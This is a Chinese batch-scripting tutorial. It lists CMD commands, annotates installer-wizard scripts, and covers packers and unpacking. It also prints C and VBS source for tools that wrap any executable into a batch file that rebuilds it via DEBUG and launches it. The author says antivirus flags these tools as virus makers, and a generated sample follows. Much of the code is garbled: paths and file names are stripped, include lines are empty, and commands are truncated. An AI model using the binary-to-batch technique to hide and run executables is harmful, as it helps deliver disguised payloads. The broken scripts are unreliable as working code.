CALL 从另一个批处理程序调用这一个。

CD 显示当前目录的名称或将其更改。

CHCP 显示或设置活动代码页数。

CHDIR 显示当前目录的名称或将其更改。

CHKDSK 检查磁盘并显示状态报告。

CHKNTFS 显示或修改启动时间磁盘检查。

CLS 清除屏幕。

CMD 打开另一个 Windows 命令解释程序窗口。

COLOR 设置默认控制台前景和背景颜色。

COMP 比较两个或两套文件的内容。

COMPACT 显示或更改 NTFS 分区上文件的压缩。

CONVERT 将 FAT 卷转换成 NTFS。您不能转换当前驱动器。

COPY 将至少一个文件复制到另一个位置。

DATE 显示或设置日期。

DEL 删除至少一个文件。

DIR 显示一个目录中的文件和子目录。

DISKCOMP 比较两个软盘的内容。

DISKCOPY 将一个软盘的内容复制到另一个软盘。

DOSKEY 编辑命令行、调用 Windows 命令并创建宏。

ECHO 显示消息，或将命令回显打开或关上。

ENDLOCAL 结束批文件中环境更改的本地化。

ERASE 删除至少一个文件。

EXIT 退出 程序(命令解释程序)。

FC 比较两个或两套文件，并显示不同处。

FIND 在文件中搜索文字字符串。

FINDSTR 在文件中搜索字符串。

FOR 为一套文件中的每个文件运行一个指定的命令。

FORMAT 格式化磁盘，以便跟 Windows 使用。

FTYPE 显示或修改用于文件扩展名关联的文件类型。

GOTO 将 Windows 命令解释程序指向批处理程序中某个标明的行。

GRAFTABL 启用 Windows 来以图像模式显示扩展字符集。

HELP 提供 Windows 命令的帮助信息。

IF 执行批处理程序中的条件性处理。

LABEL 创建、更改或删除磁盘的卷标。

MD 创建目录。

MKDIR 创建目录。

MODE 配置系统设备。

MORE 一次显示一个结果屏幕。

MOVE 将文件从一个目录移到另一个目录。

PATH 显示或设置可执行文件的搜索路径。

PAUSE 暂停批文件的处理并显示消息。

POPD 还原 PUSHD 保存的当前目录的上一个值。

PRINT 打印文本文件。

PROMPT 更改 Windows 命令提示符。

PUSHD 保存当前目录，然后对其进行更改。

RD 删除目录。

RECOVER 从有问题的磁盘恢复可读信息。

REM 记录批文件或 中的注释。

REN 重命名文件。

RENAME 重命名文件。

REPLACE 替换文件。

RMDIR 删除目录。

SET 显示、设置或删除 Windows 环境变量。

SETLOCAL 开始批文件中环境更改的本地化。

SHIFT 更换批文件中可替换参数的位置。

SORT 对输入进行分类。

START 启动另一个窗口来运行指定的程序或命令。

SUBST 将路径跟一个驱动器号关联。

TIME 显示或设置系统时间。

TITLE 设置 会话的窗口标题。

TREE 以图形模式显示驱动器或路径的目录结构。

TYPE 显示文本文件的内容。

VER 显示 Windows 版本。

VERIFY 告诉 Windows 是否验证文件是否已正确写入磁盘。

VOL 显示磁盘卷标和序列号。

XCOPY 复制文件和目录树。

3、扩展程序参数的部分参数（考虑到部分参数很危险，所以这里不提供）

cipher ——显示或更改 NTFS 分区上的目录(文件)的加密

defrag ——启动磁盘碎片整理程序

edit ——启动DOS下的文本编辑程序，在XP中也有保留

expand ——WINDOWS中自带的解压程序，可以把安装盘中文件名以_结

尾的文件解压，NT系列的安装就是在DOS下用这个对文件进行解压后进行排序安装的

EXTRACT或extrac32 ——对CAB文件进行解压缩的程序，现在都用WINRAR，所以这

个功能没什么保留价值了

makecab ——制作CAB压缩包的程序，对启动盘的制作倒很有用处

msg ——可以将消息发送给同网用户的程序，格式是[MSG 对方机

器名 信息]（不包括中括号）

ping ——可以检测网络的运行状态的程序，从WINDOWS时代开始就

有了

proxycfg ——设置代理用的程序

regsvr32 ——服务注册程序，一般是插件的注册，也可以是解码器

reg或regedit ——注册表操作程序，有时候在BAT、CMD脚本中可以用这个参

数进行注册表的修改操作

shutdown ——关机程序，可以在一定范围内控制一台或者一个局域网里

所有机器的关机时间等

systeminfo ——查看系统当前配置情况的参数，也可以显示出运行时间等

TASKKILL ——进程删除程序，这个可以关闭至少一个进程

tasklist ——查看当前进程列表的程序

二、制作带向导功能的特殊结构脚本看到标题大家可能会有点郁闷：BAT、CMD脚本也可

以实现向导功能？

很荣幸的告诉大家，是的。BAT、CMD脚本不但可以实现脚本的向导功能，而且还可以结

合大量的参数，组合成一个只需要不到100KB就可以通吃所有系统的工具包！

本介绍部分可以配合“结合Universal Extractor进行简单软件的绿化制作”所写的制作

过程进行实况编写，不过限于篇幅关系，这里只对带有向导的BAT、CMD脚本进行解析。

首先让我们看一个简单的不能再简单的例子（后边标注部分在实际应用中是不会写进脚

本的）——

@echo off ——隐藏操作过程，不对下边的操作进行显示

cls ——清除之前屏幕上的所有字符

title 智能ABC输入法 5.0 重封装版 BY 龙梦秋 ——指定当前命令行窗口标题

COLOR 1F ——指定操作界面颜

色，可以在命令行中输入 COLOR /? 来查看具体配置参数

echo *======================================================= ——在这

里可以写入自己需要显示在命令行窗口中的内容，甚至可以做成由字符组成的图形界面

echo.

echo 欢迎安装由偶重新封包的"智能ABC输入法 5.0 重封装版"！

echo 偶特意重新封包5.0版是因为很多XP简化版以及SP2的修改过echo 的版本都

把系统里的智能ABC版本升级到了5.2，这让一些习惯了echo 5.0版本的用户（包括偶）变得

无法适应。

echo 为了让包括偶在内的所有5.0用户可以回到原来的输入法环echo 境，经过偶

一番琢磨（本来打算写程序来安装，可惜偶是编程白echo 痴，写个脚本都写到差点脑中风），

后来用替换法得到了对应的echo 3个文件与1个帮助文件，另外加进一个增加、删除和调整

输入法echo 用的程序，并写了一个脚本直接进行完整安装。

echo 最后，祝您使用的愉快！

echo.

echo 更新说明：

echo.

echo 国庆节„„好难得哦～～

echo 刚才把上次制作的“智能ABC 5.0版”拿出来看了下，发现脚echo 本有点太简单，

而且这样做用户误操作的几率很高，所以对安装

echo 脚本稍微进行了一次小小的修改。

echo 相信有了向导的帮忙，用户再也不会跟偶发脾气了吧～～

echo.

echo ——龙梦秋

echo 2006年10月1日

echo *=======================================================

pause ——暂停脚本执行，按任意键可以继续

:select mode ——指定执行项目，在后面的GOTO参数中很有用

cls ——清除之前屏幕上的所有字符（以下对同样内容的

解释能省我就省，免得有人说偶骗稿子篇幅„„）

echo.

echo.

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※

echo ※ ※

echo ※ 请选择安装模式 ※

echo ※ ※

echo ※ 1、高级模式 ※

echo ※ ※

echo ※ 2、菜鸟模式 ※

echo ※ ※

echo ※ 3、自动安装模式 ※

echo ※ ※

echo ※ 4、退出安装向导 ※

echo ※ ※

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※

echo.

echo.

echo ************ 请选择要进入的模式，并按回车确定执行 ************

echo.

SET /P ST="模式选择: " ——SET参数在结合之

后的ST后将设置ST为输入项目，并在屏幕上显示等号之后的内容，在后面指定GOTO参数后将

把用户的输入操作识别并转到对应的执行项目中。/P参数表示需要在输入后再按回车才执行，

避免有的用户一旦执行错误将会出现严重问题

echo.

if /I "%ST%"=="1" goto advanced mode ——/I参数代表之前在

SET参数中字符的输入，"%ST%"表示之前设置的模式选择的输入。等号后面的双引号里的内

容为设置好的模式的转向标识，最后的GOTO后的内容则为转向的执行项目，下同

if /I "%ST%"=="2" goto easy mode

if /I "%ST%"=="3" goto setup

if /I "%ST%"=="4" goto exit

:advanced mode

Cls

echo.

echo.

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※

echo ※ ※

echo ※ "智能ABC输入法 5.0 重封装版"安装向导 ※

echo ※ ※

echo ※ ——By 龙梦秋 ※

echo ※ ※

echo ※ 1、备份当前系统的智能输入法 ※

echo ※ ※

echo ※ 2、安装"智能ABC输入法 5.0 重封装版" ※

echo ※ ※

echo ※ 3、恢复智能ABC为原来版本 ※

echo ※ ※

echo ※ 4、删除已经备份的智能ABC文件 ※

echo ※ ※

echo ※ 5、退出安装向导 ※

echo ※ ※

echo ※ 6、返回模式选择 ※

echo ※ ※

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※

echo.

echo.

echo *********** 请选择 [1,2,3,4,5,6]，并按回车确定执行 ***********

echo.

SET /P ST="当前操作: "

echo.

if /I "%ST%"=="1" goto repack

if /I "%ST%"=="2" goto setup

if /I "%ST%"=="3" goto backup

if /I "%ST%"=="4" goto delete

if /I "%ST%"=="5" goto exit

if /I "%ST%"=="6" goto select mode

:easy mode

Cls

echo.

echo.

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※

echo ※ ※

echo ※ "智能ABC输入法 5.0 重封装版"安装向导 ※

echo ※ ※

echo ※ ——By 龙梦秋 ※

echo ※ ※

echo ※ 1、安装"智能ABC输入法 5.0 重封装版" ※

echo ※ ※

echo ※ 2、恢复智能ABC为原来版本 ※

echo ※ ※

echo ※ 3、退出安装向导 ※

echo ※ ※

echo ※ 4、返回模式选择 ※

echo ※ ※

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※

echo.

echo.

echo ************* 请选择 [1,2,3,4]，并按回车确定执行 *************

echo.

SET /P ST="当前操作: "

echo.

if /I "%ST%"=="1" goto easy setup

if /I "%ST%"=="2" goto backup

if /I "%ST%"=="3" goto exit

if /I "%ST%"=="4" goto select mode

:repack

echo *=======================================================

echo 正在备份当前系统的智能输入法...

echo *=======================================================

copy %windir% %windir%-old ——在

这里输入要执行的操作的命令行，即可在隐藏了具体操作过程的时候进行原先命令行下的操

作，而屏幕上只会显示操作结果。如果不想让它显示操作结果，那么可以在命令的最后增加

上 >nul ，直接隐藏到后面的提示部分。

copy %windir% %windir%-old

copy %windir% %windir%-old

copy %windir% %windir%-old

echo *=======================================================

echo 当前系统的智能输入法已经备份完毕！

echo *=======================================================

pause

cls

goto advanced mode ——表示直接转到advanced mode项中

:setup

echo *=======================================================

echo 正在安装"智能ABC输入法 5.0 版"...

echo *=======================================================

copy %windir%

/del3:

copy %windir%

copy %windir%

copy %windir%

copy %windir%

%windir% /install:智能ABC输入法 5.0,

del %windir%

echo *=======================================================

echo "智能ABC输入法 5.0 版"安装完毕！

echo 请注销您的系统或者重新启动，以保证输入法的安装无误。

echo *=======================================================

pause

goto exit

:backupecho *=======================================================

echo 正在恢复智能ABC为原来版本...

echo *=======================================================

/del3:

DEL %windir%

DEL %windir%

DEL %windir%

DEL %windir%

rename %windir%-old %windir%

rename %windir%-old %windir%

rename %windir%-old %windir%

rename %windir%-old %windir%

copy %windir%

%windir% /install:智能ABC输入法,

del %windir%

echo *=======================================================

echo 当前系统的智能输入法已经恢复至原先版本！

echo 请注销您的系统或者重新启动，以保证输入法的安装无误。

echo *=======================================================

pause

goto exit

:delete

echo *=======================================================

echo 正在删除已经备份的智能ABC文件...

echo *=======================================================

DEL %windir%-old

DEL %windir%-old

DEL %windir%-old

DEL %windir%-old

echo *=======================================================

echo 当前系统的智能输入法备份文件已经删除！

echo *=======================================================

pause

cls

goto advanced mode

:easy setup

echo *=======================================================

echo 正在备份当前系统的智能输入法...

echo *=======================================================

copy %windir% %windir%-old

copy %windir% %windir%-old

copy %windir% %windir%-old

copy %windir% %windir%-old

echo *=======================================================

echo 当前系统的智能输入法已经备份完毕！

echo *=======================================================

echo *=======================================================

echo 正在安装"智能ABC输入法 5.0 版"...

echo *=======================================================

copy %windir%

/del3:

copy %windir%

copy %windir%

copy %windir%

copy %windir%

%windir% /install:智能ABC输入法 5.0,

del %windir%

echo *=======================================================

echo "智能ABC输入法 5.0 版"安装完毕！

echo 请注销您的系统或者重新启动，以保证输入法的安装无误。

echo *=======================================================

pause

goto exit

:exit

echo *=======================================================

echo 请按任意键退出安装向导...

echo *=======================================================

pause ——在这里本来要在最后跟上

exit参数让脚本退出，但是因为是脚本的最后部分，直接跟上PAUSE后用户随便一个操作都

可以直接退出这个BAT，所以可以省略

仔细解析以上脚本，大家可以看到它的结构非常简单、明了，大致上就是[介绍页面-

模式选择-操作过程-退出脚本]这样的结构。而且仔细看可以看到，标题一直到退出的时候

都没有进行过更改。所以如果有需要，可以在每步的项目的下面增加标题修改的脚本，这样

就可以完全模拟出跟安装程序一样的过程了。

当然，如果需要获得与一般安装程序一样拥有软件说明、授权协议、选择项目等等步骤

的话，就需要在这个脚本中进行一定的调整。

有的用户并不想拥有安装选项，那么可以参照以下的脚本来实现单页面安装——

@echo off ——隐藏操作过程，不对下边的操作进行显示

title HashTab 1.0.0.4 BY 龙梦秋 ——修改当前命令行窗口的标题

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※

※※ ——显示介绍内容或者其他内容

echo ※ ※

echo ※ HashTab 1.0.0.4 RIP版 ※

echo ※ ——BY 龙梦秋 ※

echo ※ ※

echo ※ 本程序可以在文件的右键上生成一个“文件效验”的扩展项，可以计算 ※

echo ※ 出所选文件的MD5、SHA1、CRC32值，速度之快、与系统结合后的操作之简便 ※

echo ※ 非常适合不喜欢动用专用软件的人，非常之优秀！ ※

echo ※ 如果替换后无效果，可以先结束一次进程或者注销一次， ※

echo ※再次运行该进程或者登录后即可见到使用效果。 ※

echo ※ ※

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※

※※

echo.

SET /P ST= 请输入 Y [HashTab 1.0.0.4]或 N [HashTab 1.0.0.4]，其他键退出：

——设置用户输入

echo.

if /I "%ST%"=="Y" goto install ——指定所选项目转向的执行项目

if /I "%ST%"=="N" goto uninstall

goto exit ——指定如果输入其他的操作则直接转向EXIT项目

:install

copy %windir% ——由于之前的@echo off

关闭了显示，所以这里将会显示文件复制结果

regsvr32 /s %windir% ——注册插件，采用/S参

数是为了避免出现注册插件后的确定对话框

exit ——用EXIT参数退出脚本，

在这里将在脚本执行完毕后直接退出脚本，当然也可以考虑在这里结合PAUSE与echo来显示

脚本执行后的提示信息。

:uninstall

regsvr32 /u /s %windir%

del %windir% ——这里将只会显示文件

的删除结果，可以用/Q参数禁止显示，也可以用/F参数强制把只读属性的文件删除

exit ——退出脚本

:exit

exit ——用EXIT参数退出脚本

三、利用第三方工具进行基于脚本的软件的生成这段时间在网上发现两个很好玩的工具：

EXE2BAT 1.0 与 文件转换前者会把所有EXE文件经过DEBUG程序编写成BAT脚本，让

用户在执行BAT脚本的同时可以还原该脚本中包含的文件，默认会执行还原后的文件，当然

我们可以修改生成后的脚本；后者会把所有文件都编写成BAT脚本，执行这个BAT文件的用户

将得到原文件，过程不说也很清楚，这里就PASS。

不过有趣的是，两个工具都被杀软识别为“病毒制造机”，这个我实在是不明白。之后看

了下软件的工作原理与应用范围，终于知道这两个小东西居然可以协助黑客进行攻击，真是

不能小看了人们的思考能力啊～～我这介绍两个工具并不是为了给你们做坏事，仅仅是作为

一个参考，如果因为用这两个工具做坏事被抓了，表说你认识偶„„目前已经搞到了EXE2BAT

的程序源代码，编译用的好象还是WIN32语言的样子（我看不懂„„），以下是源代码——

#include

#include

#define M 65279

char *msg="GOOD_LUCK";

void help(void);

char exe2bat(char *,char *);

int main(int argc,char **argv)

{

if(argc==1)

{

help();

}

exe2bat(argv[1],argv[2]);

return 0;

}

void help()

{

printf("nWritten by W.Z.T <==Don't be lazy,Just go ahead==>nn");

printf(" ");

exit(0);

}

char exe2bat(char *s_f,char *t_f)

{

FILE *s_fp,*t_fp;

char *s_fe=s_f;

char *t_fe=t_f;

char c;

char ch;

long lenth;

int i=1,k=256;

if((s_fp=fopen(s_fe,"rb"))==NULL)

{

printf("Can't open the file %s.n",s_fe);

exit(0);

}

if((t_fp=fopen(t_fe,"w+"))==NULL)

{

printf("Can't create the file %s.n",t_fe);

exit(0);

}

fseek(s_fp,0,SEEK_END);

lenth=ftell(s_fp);

fseek(s_fp,0,SEEK_SET);

printf("%ld,%xn",lenth,lenth);

if(lenth>=M)

{

printf("The exe file's lenth must be <= M-1n");

exit(0);

}

fputs("@echo e ",t_fp);

fprintf(t_fp,"%04x ",k);

while(!feof(s_fp))

{

k++;

c = fgetc(s_fp);

if(( unsigned char ) c<= ( unsigned char )15)

fprintf(t_fp,"0",c);

fprintf(t_fp,"%x ",(unsigned char)c);

if(i%16==0)

{

fputs(">>sgln",t_fp);

fputs("@echo e ",t_fp);

fprintf(t_fp,"%04x ",k);

}

i++;

}

if(lenth%16!=0)

fputs(">>%tmp%sgln",t_fp);

fputs("@echo rcx>>sgln",t_fp);

fprintf(t_fp,"@echo %x>>sgln",lenth,t_fp);

fputs("@echo n tthacker>>sgln",t_fp);

fputs("@echo w>>sgln",t_fp);

fputs("@echo q>>sgln",t_fp);

fputs("@debugnuln",t_fp);

fputs("@del sgln",t_fp);

fputs("@ren tthacker ",t_fp);

fprintf(t_fp,"%s>>sgln",s_fe);

fputs("@",t_fp);

fprintf(t_fp,"%s",s_fe);

fclose(s_fp);

fclose(t_fp);

puts(msg);

return 0;

}

文件转换VBS的源代码如下（大家可以复制后保存成VBS文件，然后把任意文件拉到这个

VBS文件上，将在目录下多出一个BAT文件，那个就是你的文件的“BAT版”了）——

fp=nts(0)

fn=right(fp,len(fp)-instrrev(fp,""))

with createobject("")

.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl65536

withcreateobject("stemobject").opentextfile(fp&".bat",2,tru

e)

.write "@echo str="""

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt<16 then .write "0"

.write hex(bt)

if i mod 128=0 then .write """_>>"+vbcrlf+"@echo +"""

next

.writeline """>>"+vbcrlf+"@echo with :r=vbcrlf"_

+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_

+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write

r:next>>"

.writeline "@echo .write

""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_

+"""+r+""n ""+r+""w""+r+""q""+r:end with"_

+">>&&cscript //nologo |>nul&&ren

"""&fn&"""&del "

end with

由于我现在写的是BAT、CMD批处理脚本的应用，所以在这里我们还是着重讲一下EXE2BAT。

我这里有一段由EXE2BAT生成的BAT脚本——

@echo e 100 D5 E2 BE CD CA C7 D7 AA BB BB BA F3 B5 C4 BD E1 >>tmp11

@echo e 110 B9 FB A3 AC B4 F3 BC D2 BB B9 C2 FA D2 E2 B0 C9 >>tmp11

@echo e 120 A3 BF 48 4F 48 4F A1 AB A1 AB 0D 0A 20 20 20 20 >>tmp11

@echo e 130 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 >>tmp11

@echo e 140 20 20 20 20 20 20 20 20 20 20 20 A1 AA A1 AA 42 >>tmp11

@echo e 150 59 20 C1 FA C3 CE C7 EF >>tmp11

@echo rcx>>tmp11

@echo 58>>tmp11

@echo n tmp1>>tmp11

@echo w>>tmp11

@echo q>>tmp11

@debugnul

@Copy /b /y tmp1

@start

@del tmp*

大家将上面的代码复制后保存成一个.BAT文件后执行，看看你看到了什么？

从这里大家可以看出，EXE2BAT的操作原理是先将文件经过DEBUG程序进行编码，然后分

解成字符保存。但是由于DEBUG不支持中文，所以如果转换的文件的文件名不是E文，转换后

的文件名将会是乱码。

另外，为了一些人着想，我将不会提供这两个程序与我编写的BAT版EXE2BAT。如果有需

要，可以自己研究这些软件的工作原理，这样还可以增加自己的经验，对不对？

最后，吃饭„„

（十三）壳的基础知识

壳的概念是我国软件加密与解密领域的前辈熊焰称先生在 DOS 时代推出 RCopy3 脱壳

工具时首先提出的。“壳”即是用来对 EXE、COM 和 DLL 等程序文件进行压缩或加密，在程

序中加入一段如同保护层的代码，使程序文件代码失去原来的面目，从而保护程序不被非法

修改和反编译。

1、压缩壳(Packers)随着 Internet 的快速发展和应用软件功能的不断增强以及程序本

身代码段体积的扩大，网络上出现一些可以压缩程序大小的软件，这类软件叫“Packers”。

像比较精典的压缩壳类软件 UPX Aspack PECompact，但这里所说的压缩有区别于 Winrar

Winzip 等文件压缩工具的。文件压缩工具一般是不可执行，而我们所说的压缩壳是指专用

于压缩 PE 格式的 EXE 或 DLL 程序文件的软件，是可以执行的压缩工具。

2、加密壳(Protectors)加密壳也叫保护程序，是通过给程序加上一段如同保护层的代

码，并对程序中的代码加密进行保护，使其变成另一种“变种”的代码，以有效的保护程序不

被非法修改和反编译，但有时也用于程序本身功能注册方法的限制。这类程序比压缩壳要强，

本身带有压缩程序体积功能，最重要的就是它还有加密程序的功能。Asprotect Acprotect

Armadillo DBPE() 是比较常见的几种加密工具，且本身又具有压缩功能，该类工具对

程序的保护强度远远超过压缩壳。

最近网络上又出现了不少压缩和加密强度非常高的变态壳。像 Themida (超级变态，使

用驱动解码技术)、EncryptPE (国产变态壳之一)、PE-Armor(国产密界不传强壳)、

EXECryptor(也较变态)，这类保护程序有些使用了进程注入，驱动解码，反跟踪，反调试器，

代码混肴等比较新的程序保护技术。

加壳加密

加壳就是使用压缩或加密程序的保护工具对源程序进行保护。我们可以下载相关加壳加

密工具自己实验一下，对未做过加壳程序的源程序进行保护。

加壳加密工具相关网址：

国外：

UPX--->

Aspack---->

PECompact--->/collake/

Obsidium--->/

VMProtect---->/

petite--->/petite/

Yoda's Protector--->/

VMProtect--->/

SVK Protector--->/

PESpin--->/

PELock--->/

PC Guard--->/

Krypton--->/

Exe Stealth--->/

EXECryptor--->/

ENIGMA protector--->/

Armadillo--->/

ASProtect--->/

Thinstall--->/

Xtreme-Protector--->/xprotector/

themida--->/

WinLicense--->/

还有好多，不再一一列出。如果你喜欢玩壳，就去 google 搜索一下即可。：）

国产： ACProtect、DBPE、PE-Armor、SDProtector、VProtector、pll621_shell、

EncryptPE

脱壳解密

1、脱壳

脱壳第一步需要查看壳的类型。查看壳的类型一般都使用一些侦壳工具，像 PEid、

FileInfo、PE_Scan、Stud_PE等等，这些工具在网上很好找，我就不列出网址了。它的方法

使用也很简单，新手一会儿也学会使用了，故附上查壳时的图，而不再喷口水了。

我以 PEid 0.94 为例，运行--->设置--->添加到右键菜单--->使用右键菜单查 EXE 壳

--->DLL壳

自动脱壳

何为自动脱壳？即是使用一些通用的或专门的脱壳工具对已知加壳类型的程序进行脱

壳。密界都戏称为“脱衣服”。对于通用脱壳器这种工具，都具有局限性，仅只能对付特定的

几种壳。而专门的脱壳工具仅只能脱一种壳，像 AspackDie 1.41 只能脱 Aspack 加壳的程

序，具有针对性。但使用脱壳器脱壳的优点高于其它方式的脱壳。

下面简单的演示一下使用自动脱壳器脱的操作步骤。(高手请路过 ^_^)

No.1 Aspack---->使用工具 AspackDie 1.41---->文件类型：EXE,DLL,OCX

运行 AspackDie 1.41

选择目标文件

点打开即显示脱壳成功。如果有附加数据的要选择 确定 保留附加数据即可。

No.2 UPX---->使用工具 UPX ShellEx---->文件类型：EXE,DLL,OCX,SYS

安装好 UPX ShellEx 后，右键菜单里就会多出来好多脱壳菜单项

友情提示：对于使用 UPX 压缩的程序，最好最安全的方法可以在 MS-DOS 格式下使用

UPX -d 命令进行脱壳。

CODE:

UPX 命令中文解释

-1 快速压缩 -9 较好压缩

-d 解压缩 -l 列出压缩文件

-t 测试压缩文件 -V 显示版本号

-h 更多帮助 -L 显示软件授权

UPX 选项中文解释

-q 安静方式 -v 冗长

-oFILE 写入输出到文件 -f 强制压缩可疑文件

-k 保留备份文件

[url=javascript:][Copy to clipboard][/url]

附加壳脱壳命令图：